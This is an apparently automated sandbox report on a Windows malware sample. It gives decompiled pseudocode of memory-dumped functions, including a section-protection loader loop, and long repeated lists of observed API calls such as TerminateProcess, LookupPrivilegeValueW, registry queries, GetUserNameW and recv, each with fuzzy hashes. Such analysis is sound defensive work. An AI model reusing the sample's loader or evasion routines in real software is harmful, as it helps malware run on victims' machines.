                                                                                                                        				_t32 = ( *(_t38 + 0x14) & 0x0000ffff) + _t38 + 0x18;
                                                                                                                        				if(0 >=  *(_t38 + 6)) {
                                                                                                                        					L16:
                                                                                                                        					return _t32;
                                                                                                                        				}
                                                                                                                        				_t58 = _t32 + 0x24;
                                                                                                                        				do {
                                                                                                                        					_t33 =  *_t58;
                                                                                                                        					_t43 = _t33 >> 0x0000001d & 0x00000001;
                                                                                                                        					_t52 = _t33 >> 0x0000001e & 0x00000001;
                                                                                                                        					_t62 = _t33 >> 0x1f;
                                                                                                                        					if((_t33 & 0x02000000) == 0) {
                                                                                                                        						_t63 =  *(0x422000 + (_t62 + (_t52 + _t43 * 2) * 2) * 4);
                                                                                                                        						__eflags = _t33 & 0x04000000;
                                                                                                                        						if((_t33 & 0x04000000) != 0) {
                                                                                                                        							_t63 = _t63 | 0x00000200;
                                                                                                                        							__eflags = _t63;
                                                                                                                        						}
                                                                                                                        						_t54 =  *(_t58 - 0x14);
                                                                                                                        						__eflags = _t54;
                                                                                                                        						if(__eflags != 0) {
                                                                                                                        							L12:
                                                                                                                        							if(__eflags > 0) {
                                                                                                                        								_t47 =  *((intOrPtr*)(_t58 - 0x18)) +  *((intOrPtr*)(_t68 + 0x10));
                                                                                                                        								__eflags = _t47;
                                                                                                                        								VirtualProtect(_t47, _t54, _t63, _t68 + 0x14); // executed
                                                                                                                        							}
                                                                                                                        							goto L14;
                                                                                                                        						} else {
                                                                                                                        							__eflags = _t33 & 0x00000040;
                                                                                                                        							if((_t33 & 0x00000040) == 0) {
                                                                                                                        								__eflags = _t33;
                                                                                                                        								if(_t33 >= 0) {
                                                                                                                        									goto L14;
                                                                                                                        								}
                                                                                                                        								_t48 =  *(_t38 + 0x24);
                                                                                                                        								L11:
                                                                                                                        								__eflags = _t48;
                                                                                                                        								goto L12;
                                                                                                                        							}
                                                                                                                        							_t48 =  *(_t38 + 0x20);
                                                                                                                        							goto L11;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					VirtualFree( *(_t58 - 0x1c),  *(_t58 - 0x14), 0x4000); // executed
                                                                                                                        					L14:
                                                                                                                        					_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x1c))));
                                                                                                                        					_t32 =  *(_t38 + 6) & 0x0000ffff;
                                                                                                                        					_t66 = _t66 + 1;
                                                                                                                        					_t58 =  &(_t58[0x28]);
                                                                                                                        				} while (_t66 < _t32);
                                                                                                                        				goto L16;
                                                                                                                        			}


















                                                                                                                        APIs
                                                                                                                        • VirtualFree.KERNELBASE(?,?,00004000,89FFFFFF,00000000,00401DAE,00000000,00405657,00000000,?,?,?,?,?,00401DAE,?), ref: 004052CB
                                                                                                                        • VirtualProtect.KERNEL32(89FFFFFF,?,?,?,89FFFFFF,00000000,00401DAE,00000000,00405657,00000000,?,?,?,?,?,00401DAE), ref: 00405319
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$FreeProtect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2581862158-0
                                                                                                                        • Opcode ID: c1edb189bbda30892c842c09c5d68adf0fdf97aaff2b83fca045691814e5b23a
                                                                                                                        • Instruction ID: 0a94071d5bad9c92eea86807c628c656e595f13d7ac2fbc0b4d5d5519bfedb09
                                                                                                                        • Opcode Fuzzy Hash: c1edb189bbda30892c842c09c5d68adf0fdf97aaff2b83fca045691814e5b23a
                                                                                                                        • Instruction Fuzzy Hash: 9C21CF716006028BDB18DF04D994ABBB3A6EF84344F44816EEE06AB385E774EC11CFA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 53%
                                                                                                                        			E0041665D(void* __ebx, void* __ecx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
                                                                                                                        				signed char _t28;
                                                                                                                        				intOrPtr _t30;
                                                                                                                        				short* _t31;
                                                                                                                        				signed int _t36;
                                                                                                                        				void* _t39;
                                                                                                                        				intOrPtr _t40;
                                                                                                                        				signed int _t43;
                                                                                                                        				intOrPtr* _t44;
                                                                                                                        				intOrPtr _t48;
                                                                                                                        				intOrPtr _t49;
                                                                                                                        				intOrPtr _t50;
                                                                                                                        				signed int _t51;
                                                                                                                        				signed int _t53;
                                                                                                                        				intOrPtr _t57;
                                                                                                                        				signed int _t59;
                                                                                                                        
                                                                                                                        				_t49 = __edi;
                                                                                                                        				_t39 = __ebx;
                                                                                                                        				 *((intOrPtr*)(_t59 + 0x50561c43)) =  *((intOrPtr*)(_t59 + 0x50561c43)) + __ecx;
                                                                                                                        				E0040E430(__edi);
                                                                                                                        				_t43 =  *(_t59 - 0x1c) * 0x30;
                                                                                                                        				 *((intOrPtr*)(_t59 - 0x20)) = __esi;
                                                                                                                        				_t53 = _t43 + 0x422d38;
                                                                                                                        				 *(_t59 - 0x1c) = _t53;
                                                                                                                        				L7:
                                                                                                                        				while( *_t53 != 0) {
                                                                                                                        					_t28 =  *(_t53 + 1);
                                                                                                                        					if(_t28 != 0) {
                                                                                                                        						_t51 =  *_t53 & 0x000000ff;
                                                                                                                        						_t36 = _t28 & 0x000000ff;
                                                                                                                        						while(_t51 <= _t36) {
                                                                                                                        							 *(_t39 + _t51 + 0x1d) =  *(_t39 + _t51 + 0x1d) |  *( *((intOrPtr*)(_t59 - 0x20)) + 0x422d24);
                                                                                                                        							_t36 =  *(_t53 + 1) & 0x000000ff;
                                                                                                                        							_t51 = _t51 + 1;
                                                                                                                        						}
                                                                                                                        						_t49 =  *((intOrPtr*)(_t59 + 8));
                                                                                                                        						_t53 = _t53 + 2;
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					break;
                                                                                                                        				}
                                                                                                                        				 *((intOrPtr*)(_t59 - 0x20)) =  *((intOrPtr*)(_t59 - 0x20)) + 1;
                                                                                                                        				_t53 =  *(_t59 - 0x1c) + 8;
                                                                                                                        				 *(_t59 - 0x1c) = _t53;
                                                                                                                        				if( *((intOrPtr*)(_t59 - 0x20)) < 4) {
                                                                                                                        					goto L7;
                                                                                                                        				}
                                                                                                                        				 *((intOrPtr*)(_t39 + 4)) = _t49;
                                                                                                                        				 *((intOrPtr*)(_t39 + 8)) = 1;
                                                                                                                        				_t30 = E00416238(_t49);
                                                                                                                        				 *((intOrPtr*)(_t39 + 0xc)) = _t30;
                                                                                                                        				_t31 = _t39 + 0x10;
                                                                                                                        				_t44 = _t43 + 0x422d2c;
                                                                                                                        				_t48 = 6;
                                                                                                                        				do {
                                                                                                                        					 *_t31 =  *_t44;
                                                                                                                        					_t44 = _t44 + 2;
                                                                                                                        					_t31 = _t31 + 2;
                                                                                                                        					_t48 = _t48 - 1;
                                                                                                                        				} while (_t48 != 0);
                                                                                                                        				E004162CB(_t39); // executed
                                                                                                                        				_pop(_t50);
                                                                                                                        				_pop(_t57);
                                                                                                                        				_pop(_t40);
                                                                                                                        				return E00415C0B(0, _t40,  *(_t59 - 4) ^ _t59, _t48, _t50, _t57);
                                                                                                                        			}



















                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2102423945-0
                                                                                                                        • Opcode ID: 39065a068736e76c3efdf8235f2fb7d7c9676008a4b4721518f13685da5c04e9
                                                                                                                        • Instruction ID: 1f6627891fddab4b7c16134ceeea49fa190dd0176e421cdeda56aed5aae009c5
                                                                                                                        • Opcode Fuzzy Hash: 39065a068736e76c3efdf8235f2fb7d7c9676008a4b4721518f13685da5c04e9
                                                                                                                        • Instruction Fuzzy Hash: FE110430C142548BCF168F15C8401FEBBB1EF45304B1A409FD8866F243D639C993CB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 43%
                                                                                                                        			E00416616(void* __ebx, void* __ecx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
                                                                                                                        				void* _t28;
                                                                                                                        				intOrPtr _t29;
                                                                                                                        				intOrPtr _t37;
                                                                                                                        				intOrPtr _t39;
                                                                                                                        				intOrPtr _t42;
                                                                                                                        				signed int _t43;
                                                                                                                        
                                                                                                                        				_t37 = __edi;
                                                                                                                        				_t28 = __ebx;
                                                                                                                        				 *((intOrPtr*)(_t43 + 0x50561c43)) =  *((intOrPtr*)(_t43 + 0x50561c43)) + __ecx;
                                                                                                                        				E0040E430(__edi);
                                                                                                                        				 *((intOrPtr*)(__ebx + 4)) = _t37;
                                                                                                                        				 *((intOrPtr*)(__ebx + 0xc)) = __esi;
                                                                                                                        				if( *((intOrPtr*)(_t43 - 0x18)) <= 1) {
                                                                                                                        					 *((intOrPtr*)(__ebx + 8)) = __esi;
                                                                                                                        				} else {
                                                                                                                        					if( *((char*)(__ebp - 0x12)) != 0) {
                                                                                                                        						__esi = __ebp - 0x11;
                                                                                                                        						while(1) {
                                                                                                                        							__cl =  *__esi;
                                                                                                                        							if(__cl == 0) {
                                                                                                                        								goto L10;
                                                                                                                        							}
                                                                                                                        							__eax =  *(__esi - 1) & 0x000000ff;
                                                                                                                        							__ecx = __cl & 0x000000ff;
                                                                                                                        							while(__eax <= __ecx) {
                                                                                                                        								 *(__ebx + __eax + 0x1d) =  *(__ebx + __eax + 0x1d) | 0x00000004;
                                                                                                                        								__eax = __eax + 1;
                                                                                                                        							}
                                                                                                                        							__esi = __esi + 1;
                                                                                                                        							__esi = __esi + 1;
                                                                                                                        							if( *(__esi - 1) != 0) {
                                                                                                                        								continue;
                                                                                                                        							}
                                                                                                                        							goto L10;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L10:
                                                                                                                        					__eax = __ebx + 0x1e;
                                                                                                                        					__ecx = 0xfe;
                                                                                                                        					do {
                                                                                                                        						 *__eax =  *__eax | 0x00000008;
                                                                                                                        						__eax = __eax + 1;
                                                                                                                        						__ecx = __ecx - 1;
                                                                                                                        					} while (__ecx != 0);
                                                                                                                        					__eax =  *(__ebx + 4);
                                                                                                                        					 *((intOrPtr*)(__ebx + 0xc)) = E00416238( *(__ebx + 4));
                                                                                                                        					 *((intOrPtr*)(__ebx + 8)) = __edx;
                                                                                                                        				}
                                                                                                                        				asm("stosd");
                                                                                                                        				asm("stosd");
                                                                                                                        				asm("stosd");
                                                                                                                        				E004162CB(_t28); // executed
                                                                                                                        				_pop(_t39);
                                                                                                                        				_pop(_t42);
                                                                                                                        				_pop(_t29);
                                                                                                                        				return E00415C0B(0, _t29,  *(_t43 - 4) ^ _t43, 1, _t39, _t42);
                                                                                                                        			}










                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2102423945-0
                                                                                                                        • Opcode ID: 20c6c8f03ad4f86aaf26395f958b91e6fff1ea9379615a342a02eccd45a835c8
                                                                                                                        • Instruction ID: 7d8934ea712daa1cab583a8d4690521aea4c9d33033a53be2298b2cef1a92bb2
                                                                                                                        • Opcode Fuzzy Hash: 20c6c8f03ad4f86aaf26395f958b91e6fff1ea9379615a342a02eccd45a835c8
                                                                                                                        • Instruction Fuzzy Hash: A111C8708041908FEB199F29C4913B9BFE0AF05309F2984AFDD919F286D27CC986D795
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616948942.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616161154.00000000012B2000.00000040.00000001.sdmp, Offset: 012B2000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 1Fr<
                                                                                                                        • API String ID: 0-799200857
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNEL32(?,00000E30), ref: 012BB809
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: Open
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 71445658-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • K32EnumProcessModules.KERNEL32(?,00000E30,ADEB9A77,00000000,00000000,00000000,00000000), ref: 012BA886
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumModulesProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1082081703-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.KERNEL32(?,00000E30,ADEB9A77,00000000,00000000,00000000,00000000), ref: 012BB90C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3660427363-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CertGetCertificateChain.CRYPT32(?,00000E30,?,?), ref: 012BBC52
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: CertCertificateChain
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3019455780-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • TerminateProcess.KERNEL32(?,00000E30,ADEB9A77,00000000,00000000,00000000,00000000), ref: 012BBB4C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 560597551-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindNextFileW.KERNEL32(?,00000E30,?,?), ref: 012BA1C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2029273394-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • K32GetModuleInformation.KERNEL32(?,00000E30,ADEB9A77,00000000,00000000,00000000,00000000), ref: 012BA976
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3425974696-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000E30,?,?), ref: 012BAA82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 514040917-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.KERNEL32(?,00000E30,?,?), ref: 012BBEA6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3660427363-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(?,00000E30), ref: 012BAF93
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNEL32(?,00000E30), ref: 012BB809
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: Open
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 71445658-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.KERNEL32(?,00000E30,ADEB9A77,00000000,00000000,00000000,00000000), ref: 012BB90C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3660427363-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindCloseChangeNotification.KERNEL32(?,ADEB9A77,00000000,?,?,?,?,?,?,?,?,723F3C38), ref: 012BA6B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2591292051-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • K32GetModuleInformation.KERNEL32(?,00000E30,ADEB9A77,00000000,00000000,00000000,00000000), ref: 012BA976
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3425974696-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • MkParseDisplayName.OLE32(?,00000E30,?,?), ref: 012BB9FE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: DisplayNameParse
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3580041360-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 012BA3E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3899507212-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • K32EnumProcessModules.KERNEL32(?,00000E30,ADEB9A77,00000000,00000000,00000000,00000000), ref: 012BA886
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumModulesProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1082081703-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012BB70A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • TerminateProcess.KERNEL32(?,00000E30,ADEB9A77,00000000,00000000,00000000,00000000), ref: 012BBB4C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 560597551-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetUserNameW.ADVAPI32(?,00000E30,?,?), ref: 012BAC2E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: NameUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2645101109-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(?,00000E30), ref: 012BAF93
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindCloseChangeNotification.KERNEL32(?,ADEB9A77,00000000,?,?,?,?,?,?,?,?,723F3C38), ref: 012BA290
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2591292051-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: recv
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1507349165-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 012BA3E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3899507212-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000E30,?,?), ref: 012BAA82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 514040917-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CertGetCertificateChain.CRYPT32(?,00000E30,?,?), ref: 012BBC52
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: CertCertificateChain
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3019455780-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindNextFileW.KERNEL32(?,00000E30,?,?), ref: 012BA1C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2029273394-0
                                                                                                                        • Opcode ID: 5576613bc31987a4c93946e34899076a6cbba23dcdf1b850f3fdbec4396428cc
                                                                                                                        • Instruction ID: f32f88873a19b2b9a1ad329217536e9a87e527df2cf3732a53064bdeb90f22f7
                                                                                                                        • Opcode Fuzzy Hash: 5576613bc31987a4c93946e34899076a6cbba23dcdf1b850f3fdbec4396428cc
                                                                                                                        • Instruction Fuzzy Hash: 6B017171501600ABD710DF26DC86B36FBA8FB85A20F14816AED089B641E635F915CAA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012BB70A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        • Opcode ID: 900bdba86a90a9f41b227edc3d83ce39e7f43158ab72d5006db907c20707be9e
                                                                                                                        • Instruction ID: 8080d8327cb18f646f4a52e74f2af51181f461984f09a1d261f65d1fdb0021b4
                                                                                                                        • Opcode Fuzzy Hash: 900bdba86a90a9f41b227edc3d83ce39e7f43158ab72d5006db907c20707be9e
                                                                                                                        • Instruction Fuzzy Hash: D7016D328107409FDB21CF55E885BA2FFE0EF48720F08C4AADE894B612D276E419DF61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • MkParseDisplayName.OLE32(?,00000E30,?,?), ref: 012BB9FE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: DisplayNameParse
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3580041360-0
                                                                                                                        • Opcode ID: a02535c6e6b6495c9ab0428a29d226f7960f021431e1d969d4b4babc0690ca06
                                                                                                                        • Instruction ID: d19d489f6bf85af7289a721b94a732a8cffe4709f00b24a22bd12ca57ea3f015
                                                                                                                        • Opcode Fuzzy Hash: a02535c6e6b6495c9ab0428a29d226f7960f021431e1d969d4b4babc0690ca06
                                                                                                                        • Instruction Fuzzy Hash: AE018B71500600ABD220DF1ADC86B22FBA8FB89B20F14811AED084B641E631F915CAA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindCloseChangeNotification.KERNEL32(?,ADEB9A77,00000000,?,?,?,?,?,?,?,?,723F3C38), ref: 012BA6B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2591292051-0
                                                                                                                        • Opcode ID: 6ed99f4842450d0f5f33456be162920bb05149e388504bc91e48bcf78a31e51d
                                                                                                                        • Instruction ID: eb6029aea2f35ed89d2cb1b1138555e823ee1b5a8b24fce3931647ec01c2136a
                                                                                                                        • Opcode Fuzzy Hash: 6ed99f4842450d0f5f33456be162920bb05149e388504bc91e48bcf78a31e51d
                                                                                                                        • Instruction Fuzzy Hash: 890184715143408FDB11CF29E8857A6FBA4EF40720F08C0AADD498B652D6B5A448CB72
